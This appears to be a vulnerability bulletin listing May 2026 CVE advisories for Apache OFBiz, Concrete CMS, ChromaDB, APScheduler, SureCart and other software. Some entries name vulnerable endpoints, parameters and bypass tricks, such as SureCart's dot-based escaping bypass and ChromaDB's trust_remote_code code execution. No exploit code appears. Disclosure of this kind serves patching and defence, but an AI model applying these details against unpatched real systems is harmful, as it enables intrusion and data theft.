| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. Please note that in the updated version, "Data Resource" records with dataTemplateTypeId = "FTL" are no longer supported. Additionally, in the updated version, the "Ecommerce Customer" security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well. | 2026-05-19 | not yet calculated | CVE-2026-29207 | https://lists.apache.org/thread/3rcrp8bh3x6ovrj5xnc0fm1f0nrn52r0 |
| Apache Software Foundation--Apache OFBiz | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-29220 | https://lists.apache.org/thread/5hjnmt9no6mmtg8sxq3mhonzff1vkd5m |
| Apache Software Foundation--Apache OFBiz | Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz via Content component operations. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-29226 | https://lists.apache.org/thread/6707wys8jxzmowxggn4cmtwwk9ygl2tr |
| Apache Software Foundation--Apache OFBiz | Improper Input Validation vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31378 | https://lists.apache.org/thread/cbl8qkqtxv90m6ssfwd58bnoh933v38t |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31379 | https://lists.apache.org/thread/1tcnkxjm0s6n1ohfb21brl25dt0hv9by |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31380 | https://lists.apache.org/thread/v2brvq1tf4q491obkxv8p7fc5qfshc08 |
| Apache Software Foundation--Apache OFBiz | Improper Authentication vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31387 | https://lists.apache.org/thread/3wgybgdvmbfvly24zm4sb4y53fc1pqcf |
| Apache Software Foundation--Apache OFBiz | Improper Access Control vulnerability in Apache OFBiz in multi-tenant deployments. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31388 | https://lists.apache.org/thread/npjchvnpnosoqpto46s2om12jd9s7py7 |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31906 | https://lists.apache.org/thread/1fblqdo89d3ps8kgtcnkcq8sh7gwkcpn |
| Apache Software Foundation--Apache OFBiz | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31909 | https://lists.apache.org/thread/0hpopzz1qrhkzsbt3ncofs6qo0545r2h |
| Apache Software Foundation--Apache OFBiz | Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31910 | https://lists.apache.org/thread/2smc4c4o056ovd2hoq1l29593y5y29vh |
| Apache Software Foundation--Apache OFBiz | Use of Hard-coded Cryptographic Key vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31986 | https://lists.apache.org/thread/2hl9xoqm8tq8b22x6vnmtp7tg3opcqgc |
| Apache Software Foundation--Apache OFBiz | Improper Control of Generation of Code ('Code Injection') vulnerability in email services of Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-35086 | https://lists.apache.org/thread/g0s37yhnh2xwfts400crb2w8s337hgjx |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-41919 | https://lists.apache.org/thread/592czh9o69n74c036vy30fnqknocw74p |
| Apache Software Foundation--Apache OFBiz | Improper Authorization vulnerability in Apache OFBiz Webtools. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-45187 | https://lists.apache.org/thread/pcmfyxjyk7dg0btxqg9h7cr30yg8mr7k |
| Apache Software Foundation--Apache OFBiz | Improper Authentication vulnerability in Apache OFBiz via Password-Change Logic Flaw Leading to Remote Code Execution This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-45434 | https://lists.apache.org/thread/yw4owrzl0yho1yx7oqxvr6xjkmln9tq8 |
| Apache Software Foundation--Apache OFBiz | Improper Control of Generation of Code ('Code Injection'), Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-46586 | https://lists.apache.org/thread/7mgjl81nrpxqtfcg6h5qtrx7wztbl4js |
| Apple--Private Cloud Compute Server Software | An attacker in a privileged network position may be able to leak sensitive information. A path handling issue was addressed with improved validation. This issue is fixed in PCC Release 5E290.3. | 2026-05-18 | not yet calculated | CVE-2026-20685 | https://security.apple.com/documentation/private-cloud-compute/releasenotes#darwin-init |
| APScheduler--JSONSerializer and CBORSerializer | The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers | 2026-05-19 | not yet calculated | CVE-2026-31072 | https://github.com/agronholm/apscheduler https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6 |
| Arm--ArmNN | In Arm ArmNN through 2026-03-27, an integer overflow in TensorShape::GetNumElements() in armnn/Tensor.cpp allows a crafted TFLite model file to bypass buffer size validation and trigger a heap-based buffer over-read during model optimization. The overflow occurs when multiplying tensor dimensions using 32-bit unsigned arithmetic without overflow detection, causing GetNumBytes() to return an understated allocation size. During Optimize()->InferOutputShapes(), the BatchToSpaceNdLayer reads beyond the allocated buffer. | 2026-05-22 | not yet calculated | CVE-2026-42627 | https://github.com/ARM-software/armnn/blob/main/src/armnn/Tensor.cpp https://github.com/ARM-software/armnn/blob/main/src/armnnTfLiteParser/TfLiteParser.cpp |
| awesomemotive--NextGEN Gallery | NextGEN Gallery version prior to 4.2.1 are vulnerable to authenticated SQL injection via the 'orderby' parameter on the REST API endpoints '/imagely/v1/galleries' and '/imagely/v1/albums'. The root cause is an insufficient sanitization function ('_clean_column()') in the data mapper layer that uses a character blacklist instead of a whitelist approach. This allows an authenticated attacker with the 'NextGEN Gallery overview' capability (assigned to the Administrator role by default) to inject arbitrary SQL into the 'ORDER BY' clause. | 2026-05-20 | not yet calculated | CVE-2026-9059 | https://www.tenable.com/security/research/tra-2026-42 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and directly renders them when accessed through the domain. By uploading a crafted malicious SVG file containing embedded JavaScript, an attacker will execute arbitrary JavaScript code. This vulnerability directly enables stored XSS exploitation because the payload is persistently stored on your infrastructure (app.typebot.io) and accessible from a public-facing, permanent link. Stored XSS via malicious SVG uploads to app.typebot.io allows attackers to execute arbitrary JavaScript in victims' browsers, enabling session/token theft, account takeover, and exfiltration of sensitive user data. This issue has been fixed in version 3.16.0. | 2026-05-22 | not yet calculated | CVE-2026-39970 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-jj87-c343-26vp https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Best Practical--Request Tracker | Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the "Page" parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim's browser. This vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2. | 2026-05-21 | not yet calculated | CVE-2026-6841 | https://cert.pl/en/posts/2026/05/CVE-2026-6841 https://requesttracker.com/request-tracker/ https://docs.bestpractical.com/release-notes/rt/5.0.10 https://docs.bestpractical.com/release-notes/rt/6.0.3 |
| BillaBear--BillaBear | BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands. | 2026-05-19 | not yet calculated | CVE-2026-31069 | https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e https://github.com/BillaBear/billabear https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9 |
| brainstormforce--Surecart | SureCart version prior to 4.2.1 are vulnerable to authenticated SQL injection via multiple parameters ('model_name', 'model_id', 'integration_id', 'provider') on the REST API endpoint '/surecart/v1/integrations/{id}'. The root cause is a flawed escaping bypass in the query builder ('wp-query-builder'). Values passed to the 'where()' method are only sanitized via '$wpdb->prepare()' when they do **not** contain a dot ('.') or the WordPress table prefix ('wp_'). By including a dot anywhere in the payload, an attacker completely bypasses the escaping logic and injects arbitrary SQL into the 'WHERE' clause, allowing full UNION-based extraction of the database. | 2026-05-20 | not yet calculated | CVE-2026-9065 | https://www.tenable.com/security/research/tra-2026-43 |
| Broadcom--Automic Automation | Execution with unnecessary privileges vulnerability in Broadcom Automic Automation Agent Unix on Linux x64, Linux Power 64 BE, Linux Power 64 LE, zLinux (zSeries), AIX, Solaris x64, Solaris Sparc 64 allows Privilege Escalation, Target Programs with Elevated Privileges. This issue affects Automic Automation: < 24.4.4 HF1. | 2026-05-19 | not yet calculated | CVE-2026-8370 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37512 |
| BYD--Atto3 | In BYD Atto3, an attacker can obtain an authentication key through Brute Force attack, which is permanently available. The authentication key enables flash to the Electronic Parking Break (EPB) and Supplemental Restoration System (SRS) related ECUs. | 2026-05-19 | not yet calculated | CVE-2025-61081 | https://www.notion.so/BYD-Atto3-26215fb6156c8000b338db3c2011f637?source=copy_link https://www.notion.so/CVE-2025-61081-26215fb6156c8000b338db3c2011f637 |
| Centralny Instytut Ochrony Pracy - Pastwowy Instytut Badawczy--STER | A SQL injection vulnerability has been identified in STER. Improper neutralization of input provided by user into multiple Search Filters allows for SQL Injection attacks. It allows an authenticated attacker to view sensitive data such as data belonging to other users, or any other data that the application itself is able to access This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25606 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Centralny Instytut Ochrony Pracy - Pastwowy Instytut Badawczy--STER | Use of a weak password encoding algorithm in STER software allows the value of the password to be guessed after analyzing how passwords with known values are encoded. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25607 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Centralny Instytut Ochrony Pracy - Pastwowy Instytut Badawczy--STER | STER uses unencrypted TCP traffic to transmit data over the network. It allows an attacker to conduct a Man-In-The-Middle attack and obtain sensitive data such as passwords, personal data, or authentication tokens. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25608 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Chroma--ChromaDB | A pre-authentication, code injection vulnerability in version 1.0.0 or later of the ChromaDB Python project allows an unauthenticated attacker to run arbitrary code on the server by sending a malicious model repository and trust_remote_code set to true in the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint. | 2026-05-18 | not yet calculated | CVE-2026-45829 | https://www.hiddenlayer.com/research/chromatoast-served-pre-auth https://github.com/chroma-core/chroma/issues/6717 |
| ClipBucket--ClipBucket v5 v.5.5.2 | An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components | 2026-05-22 | not yet calculated | CVE-2026-37470 | http://clipbucket.com https://medium.com/@arpit03sharma2003/cve-2026-37470-clickjacking-vulnerability-in-clipbucket-v5-leads-to-credential-theft-and-8415def7804a |
| CODESYS--Visualization | The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session. | 2026-05-21 | not yet calculated | CVE-2026-0393 | https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller. Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions.The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.9 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. | 2026-05-21 | not yet calculated | CVE-2026-6826 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | In Concrete CMS 9.5.0 and below, the submit_password() method in concrete/controllers/single_page/download_file.php allows unauthorized file access since downloading permission-restricted files bypasses the view_file permission check. Files without passwords can be downloaded and any user who knows a file's password can download a password protected file regardless of whether they have permission to access the file. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Youssef Eid for reporting | 2026-05-21 | not yet calculated | CVE-2026-7879 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is subject to Insecure Direct Object Reference (IDOR) in the Express Entry Detail block via the exEntryID parameter. This IDOR leads to unauthorized access to all Express form submissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7881 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthorized file deletion due to an Inverted CSRF token check in the DeleteFile controller. The code throws an error when the token IS valid and proceeds with file deletion when the token is invalid or missing. This effectively disables CSRF protection for the file deletion endpoint, allowing cross-site request forgery attacks against users who have permission to edit conversation messages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector of CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7882 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR in AddMessage/UpdateMessage via attachments[] parameter which can lead to file permission bypass. The `AddMessage` and `UpdateMessage` conversation controllers accept user-supplied file attachment IDs and load files directly via `$em->find(File::class, $attachmentID)` without checking per-file permissions (`canViewFile()`). A user who can post in any conversation can reference any file in the CMS file manager by its sequential ID, effectively bypassing the file permission system. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. if a site truly has private files, the owner should set up a private storage location https://documentation.concretecms.org/user-guide/editors-reference/dashboard/system-and-maintenance/files/file-storage-locations outside of the webroot so that permissions can be checked on view as well. That way, even if a authorized user attaches a file, or otherwise links to it, unauthorized users won't be able to view the file. | 2026-05-21 | not yet calculated | CVE-2026-7886 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | For Concrete CMS 9.5.0 and below, OAuth 2.0 Authorization-Code Handler Bypasses Account Status. A user with uIsActive=0 (suspended, banned, terminated employee) can still authenticate via OAuth and receive valid API tokens. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N. Thanks 0x4c616e for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7887 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | In Concrete CMS 9.5.0 and below, the RSS Displayer block accepts a feed URL from any page editor and fetches it server-side without validation enabling redirect-to-internal bypasses. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:N. | 2026-05-21 | not yet calculated | CVE-2026-7890 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below fails to sanitize path traversal sequences in the ptComposerFormLayoutSetControlCustomTemplate field when saving page type composer form layouts. An authenticated rogue administrator with composer form editing rights can exploit this to include arbitrary readable files on the server. Combined with the file uploader's extension-only validation (which permits PHP code in files saved with image extensions like .png), this can result in authenticated remote code execution. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 9.4 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8134 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Remote Code Execution due to insecure deserialization occurring in the ExpressEntryList block controller. An rogue administrator with privileges to add blocks to an area can bypass the intended protection mechanism (_fromCIF === true), which normally restricts malicious inputs over form POST requests, by leveraging the REST API functionality. Because the REST API parses requests using json_decode(), the string "true" is evaluated as a strict PHP Boolean(true). This bypass allows the attacker to inject a malicious serialized payload into the block's filterFields database column. The payload will subsequently be executed when the block's data is viewed or edited by an administrator leading to complete server takeover (RCE).The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with a vector of CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks Nguyễn Văn Thiện https://github.com/Thien225409 for reporting | 2026-05-21 | not yet calculated | CVE-2026-8135 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via external-link page cvName because updateCollectionAliasExternal bypasses being sanitized. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8139 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/install/download/<remoteId>. The download() method in concrete/controllers/single_page/dashboard/extend/install.php checks only the canInstallPackages() permission before fetching a remote marketplace package and writing it to the server's DIR_PACKAGES directory. Because the endpoint is a state-changing GET route with no token enforcement, an attacker who can cause an authenticated administrator to visit a crafted page can force an arbitrary marketplace package to be downloaded. In order to be vulnerable, the victim must be passing canInstallPackages() and the site must be connected to the Concrete marketplace. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8140 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via OAuth integration name. The OAuth authorize template renders the integration name (admin-controlled) through Concrete's t() translation helper as a sprintf-style format. The <strong>...</strong> wrap is built by PHP string interpolation before t() runs, so the integration name lands in the translated output as raw HTML. A rogue admin could potentially snoop on login submissions.The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8197 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below has Stored XSS on the height parameter. The controller does not validate or sanitize $height. Any user with editor privileges can inject malicious JavaScript that executes in the context of any visitor's browser, potentially leading to session hijacking, credential theft, or other malicious actions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Alfin Joseph for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8203 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to authorization Bypass in the Calendar Event Frontend Dialog which can allow cross-calendar data disclosure. A public calendar block can be used as a pivot point to access private calendar data. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8204 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to authorization bypass in the Calendar Block since action_get_events does not check canView on the calendar which results in restricted event details being disclosed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks lalalala5678 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8205 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a missing authentication gate. The endpoint /ccm/system/dialogs/file/usage/{fID} accepts an integer file ID in the URL and returns internal site structure data (page IDs, versions, URL paths) to anyone who sends a GET request. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8236 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The `/ccm/frontend/conversations/message_detail` endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8237 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The '/ccm/frontend/conversations/message_page' endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8238 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The '/ccm/frontend/conversations/get_rating' endpoint confirms existence and returns rating score for any message by ID. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8239 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthenticated page metadata disclosure across every page with a configured summary template, revealing the existence of private, draft, and restricted pages while leaking title, path, description, and author information. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8240 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Reflected XSS in Legacy Pagination via HTML attribute injection. Concrete\Core\Legacy\Pagination builds pagination links by raw-interpolating its $URL field into href="" (<a href="{$linkURL}" …>). Any authenticated admin or report viewer with access to `/dashboard/reports/forms/legacy` who clicks the crafted URL fires the payload in their session. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting | 2026-05-21 | not yet calculated | CVE-2026-8245 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS below 9.5.0 and below is vulnerable to password change without reauthorization and session-hardening bypass. The user-profile edit controller passes the entire raw POST array to UserInfo::update() without field whitelisting resulting in password change without requiring the current password and also resulting in registered users able to disable the per-user-IP-pinning in the session validator which is meant to detect hijacking. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks 0x4c616e for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8327 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR in surveys. To be vulnerable, a site would have to be configured in such a way that both public and private surveys are present on the site. An unauthenticated attacker can vote in the restricted survey by submitting the restricted optionID through the public survey's endpoint. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Zer0daySec https://github.com/Zee99y for reporting | 2026-05-21 | not yet calculated | CVE-2026-8337 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
